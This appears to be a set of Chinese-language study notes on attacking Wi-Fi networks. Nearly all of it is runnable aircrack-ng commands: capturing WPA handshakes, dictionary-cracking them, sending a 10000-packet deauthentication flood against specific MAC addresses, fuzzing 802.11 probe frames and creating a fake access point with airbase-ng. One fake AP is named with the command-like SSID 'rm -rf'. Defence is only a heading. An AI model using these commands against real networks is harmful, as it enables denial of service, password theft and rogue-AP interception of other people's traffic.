常见的无线攻击威胁
fake ap攻击
ARP&Dns劫持
WIFI DOS 公攻击
操作命令:
iwconfig
airm
airodump-ng 名称
airmon-ng start name
airodump-ng --bssid xxx -c 信道 -w 保存文件 wlan0mon
aircrack-ng 包 -w 字典
airodump-ng --bssid B4:0B:44:C2:D5:FF -c 11 -w xmantest wlan0mon
--ivs
只抓握手包
airodump-ng wlan0mon
切换信道:
iwconfig wlan0mon channel 11
踢下线:
aireplay-ng -0 10000 -a B4:0B:44:C2:D5:FF -c C4:B3:01:C4:27:31 wlan0mon
wlan.fc.type_subtype==12
无线攻防与进阶
- ProbeRequest Frame
- ProbeRequest SSID 暴露位置信息&定位
- WPA-Radius 企业无线攻防
- 攻击802.11客户端
针对无线设备的漏洞挖掘
- 802.11 Fuzzing
无线攻击的识别与防御
fuzz 要根据协议规范,不然协议不认,长度无所谓,但是帧类型的话要根据规范 要知道ap发给客户端还是客户端发给ap
wireshark 流量还原
wifuzz 小工具
python wifuzz.py -s 尿尿 -i wlan0mon probe
scapy 封装好协议
iwconfig wlan0mon channel 1
airbase-ng -e "rm -rf" -c 1 -v wlan0mon
推荐博客:http://www.wiattack.net/index.php/archives/7/